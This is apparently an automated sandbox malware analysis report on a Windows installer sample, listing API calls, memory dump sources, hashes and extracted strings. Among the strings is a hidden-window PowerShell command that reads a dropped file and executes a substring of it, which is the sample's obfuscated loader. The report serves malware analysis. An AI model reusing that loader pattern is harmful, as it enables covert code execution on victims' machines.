                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 4a21b584643edb5046f40e6021edddc559103c8bcb4823ec96b2e5e26057261d
                                                                          • Instruction ID: d597ae01fe190944f955af81f6da1ccc19e01168c6f1380e4bfb18bbb963e91e
                                                                          • Opcode Fuzzy Hash: 4a21b584643edb5046f40e6021edddc559103c8bcb4823ec96b2e5e26057261d
                                                                          • Instruction Fuzzy Hash: E7D0C977B141509BDB50E7B8AE8945A73A8EB5132A7248833D902E10D2E27DC8429619
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004047FA
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404805
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 0040484F
                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404862
                                                                          • SetWindowLongA.USER32(?,000000FC,00404DD9), ref: 0040487B
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040488F
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048A1
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 004048B7
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048C3
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048D5
                                                                          • DeleteObject.GDI32(00000000), ref: 004048D8
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404903
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040490F
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049A4
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049CF
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E3
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404A12
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A20
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404A31
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2E
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B93
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA8
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCC
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BEC
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C01
                                                                          • GlobalFree.KERNEL32(?), ref: 00404C11
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C8A
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404D33
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D42
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D62
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404DB0
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404DBB
                                                                          • ShowWindow.USER32(00000000), ref: 00404DC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: 69bb8c9092f751f6f699f5119f3777ca3af1155a8d83edf44d343ffd82b318b7
                                                                          • Instruction ID: 37c04c0b90b062a92b087f54257bcfd02c7998473ae754967dc03ef3014ad8ed
                                                                          • Opcode Fuzzy Hash: 69bb8c9092f751f6f699f5119f3777ca3af1155a8d83edf44d343ffd82b318b7
                                                                          • Instruction Fuzzy Hash: DA025CB0900249AFEB10DFA5DC45AAE7BB5FB84314F10857AF610BA2E1C7799E41CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004042F5
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040431F
                                                                          • SHBrowseForFolderA.SHELL32(?,0079D8D0,?), ref: 004043D0
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004043DB
                                                                          • lstrcmpiA.KERNEL32(Exec,0079E4F8), ref: 0040440D
                                                                          • lstrcatA.KERNEL32(?,Exec), ref: 00404419
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040442B
                                                                            • Part of subcall function 00405372: GetDlgItemTextA.USER32(?,?,00000400,00404462), ref: 00405385
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
                                                                            • Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F
                                                                          • GetDiskFreeSpaceA.KERNEL32(0079D4C8,?,?,0000040F,?,0079D4C8,0079D4C8,?,00000000,0079D4C8,?,?,000003FB,?), ref: 004044E6
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404501
                                                                          • SetDlgItemTextA.USER32(00000000,00000400,0079D4B8), ref: 00404587
                                                                          Strings
                                                                          • A, xrefs: 004043C9
                                                                          • "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 004042BF
                                                                          • Exec, xrefs: 00404407, 0040440C, 00404417
                                                                          • C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited, xrefs: 004043F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                          • String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$A$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$Exec
                                                                          • API String ID: 2246997448-4099546290
                                                                          • Opcode ID: ea3b955debdcdc4cb8b1b8e5bb57ea13b8ccd09341252b79b0c66d07a749c749
                                                                          • Instruction ID: ee484549d64efd2eff965cea5eda3c12ecb716279ba3017c649c9a7946b17b4b
                                                                          • Opcode Fuzzy Hash: ea3b955debdcdc4cb8b1b8e5bb57ea13b8ccd09341252b79b0c66d07a749c749
                                                                          • Instruction Fuzzy Hash: 3C9183B1900218BBDF11AFA1CC41AAF77B8EF84315F54847BFA05B62D1C77C9A418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040403C
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404050
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040406E
                                                                          • GetSysColor.USER32(?), ref: 0040407F
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040408E
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040409D
                                                                          • lstrlenA.KERNEL32(?), ref: 004040A0
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040AF
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040C4
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404126
                                                                          • SendMessageA.USER32(00000000), ref: 00404129
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404154
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404194
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004041A3
                                                                          • SetCursor.USER32(00000000), ref: 004041AC
                                                                          • ShellExecuteA.SHELL32(0000070B,open,007A0EA0,00000000,00000000,00000001), ref: 004041BF
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004041CC
                                                                          • SetCursor.USER32(00000000), ref: 004041CF
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041FB
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040420F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: Exec$N$open$|?@
                                                                          • API String ID: 3615053054-360928054
                                                                          • Opcode ID: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
                                                                          • Instruction ID: 1aa85ca6dc080267a903cc48d2afa20b9f684c9b7acc4f3344bac945280a7f58
                                                                          • Opcode Fuzzy Hash: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
                                                                          • Instruction Fuzzy Hash: D061E5B1A40209BFEB109F20DD45F6A3B69FB44741F10856AFB04BA2D1C7B8E951CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,Profiling Setup,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$Profiling Setup
                                                                          • API String ID: 941294808-625439139
                                                                          • Opcode ID: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
                                                                          • Instruction ID: 1970eda38267bcdb885ac0a700297f93df6a90a6824bbd846fa9b4042a90093d
                                                                          • Opcode Fuzzy Hash: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
                                                                          • Instruction Fuzzy Hash: DE419A71804249AFCB058F95CD459BFBFB9FF45311F00812AF962AA1A0C738EA50DFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcpyA.KERNEL32(007A0288,NUL,?,00000000,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058C2
                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058E6
                                                                          • GetShortPathNameA.KERNEL32(00000000,007A0288,00000400), ref: 004058EF
                                                                            • Part of subcall function 00405770: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
                                                                            • Part of subcall function 00405770: lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2
                                                                          • GetShortPathNameA.KERNEL32(?,007A0688,00000400), ref: 0040590C
                                                                          • wsprintfA.USER32 ref: 0040592A
                                                                          • GetFileSize.KERNEL32(00000000,00000000,007A0688,C0000000,00000004,007A0688,?,?,?,?,?), ref: 00405965
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405974
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059AC
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0079FE88,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A02
                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A14
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405A1B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405A22
                                                                            • Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
                                                                            • Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                          • API String ID: 1265525490-4148678300
                                                                          • Opcode ID: 6f5e4b39622fb637ff713e3a36fe671cf140b9a9d1460b59bca6c69fc40f4791
                                                                          • Instruction ID: eaebdebf8796e3850c000fe6eb76ad3f7fb5957efc68c2b36b1b91be42a79c1d
                                                                          • Opcode Fuzzy Hash: 6f5e4b39622fb637ff713e3a36fe671cf140b9a9d1460b59bca6c69fc40f4791
                                                                          • Instruction Fuzzy Hash: 6A410271604B09BFD6206B656C8AF6B3A9CDF45755F14063AFE01F22D2DA7CA8008E7D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCommandLineA.KERNEL32(00000400), ref: 10001917
                                                                          • lstrcpynA.KERNEL32(?,00000000), ref: 10001925
                                                                          • CharNextA.USER32(00000022), ref: 10001952
                                                                          • CharNextA.USER32(00000022), ref: 1000195B
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 1000197C
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000198E
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 1000199B
                                                                          • CloseHandle.KERNEL32(?), ref: 100019AA
                                                                          • CloseHandle.KERNEL32(?), ref: 100019AF
                                                                          • ExitProcess.KERNEL32 ref: 100019B4
                                                                          • ExitProcess.KERNEL32 ref: 100019BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                                          • String ID: "$"$D
                                                                          • API String ID: 3771911414-3923985841
                                                                          • Opcode ID: 12b261d6a5aa96717ea24bad317dba62f878875c91062f505561c8784659ec93
                                                                          • Instruction ID: b40d0a37d8f927bbe092ed1c880d4586c9b93be4a50fa1aacb8e4b1865fff066
                                                                          • Opcode Fuzzy Hash: 12b261d6a5aa96717ea24bad317dba62f878875c91062f505561c8784659ec93
                                                                          • Instruction Fuzzy Hash: 84213DB180425DAFFF11DBA0CC98BEFBFBAEB05391F404055E245A20A6D6701D49CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
                                                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F
                                                                          Strings
                                                                          Memory Dump Source
